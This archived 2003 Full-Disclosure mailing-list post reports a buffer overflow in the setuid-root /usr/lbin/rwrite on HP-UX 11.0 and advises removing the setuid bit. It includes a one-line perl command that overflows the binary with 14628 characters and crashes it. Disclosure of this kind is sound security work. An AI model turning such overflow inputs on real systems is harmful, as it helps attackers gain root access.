[Full-Disclosure] HP-UX 11.0 /usr/lbin/rwrite

bt_at_delfi.lt
Date: 05/02/03

  • Next message: Nicolas Couture: "Re: [Full-Disclosure] GLSA: openssh (200305-01)" 
    To: bugtraq@securityfocus.com
Date: Fri, 2 May 2003 20:16:53 +0300

    Hi!

    There is a vulnerability in /usr/lbin/rwrite on HP-UX 11.0 (other versions might be vulnerable too).

    /usr/lbin/rwrite is installed setuid to root by default.

    $ /usr/lbin/rwrite something `perl -e 'print "A" x 14628'` something
    Segmentation fault

    Solution : remove setuid bit until patch is available.

    Tried to contact security-alert@hp.com , got "Client rejected. Access denied".

    Bye,

    bt@delfi.lt
    <--------------------===========================-------------------->
    Meiles zinutes sirdies damai ar riteriui: siusk MEILE numeriu 1325.
    Jei siunti draugui, po zodzio MEILE nurodyk jo mob. telefono numeri.
    Zinutes kaina 1 Lt. http://sms.delfi.lt/
    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html

  • Next message: Nicolas Couture: "Re: [Full-Disclosure] GLSA: openssh (200305-01)"

    Relevant Pages

    • HP-UX 11.0 /usr/lbin/rwrite
      ... /usr/lbin/rwrite is installed setuid to root by default. ... Meiles zinutes sirdies damai ar riteriui: siusk MEILE numeriu 1325. ...
      (Bugtraq)
    • [Full-Disclosure] HP-
      ... Meiles zinutes sirdies damai ar riteriui: siusk MEILE numeriu 1325. ... Full-Disclosure - We believe in it. ...
      (Full-Disclosure)
    • Quantcast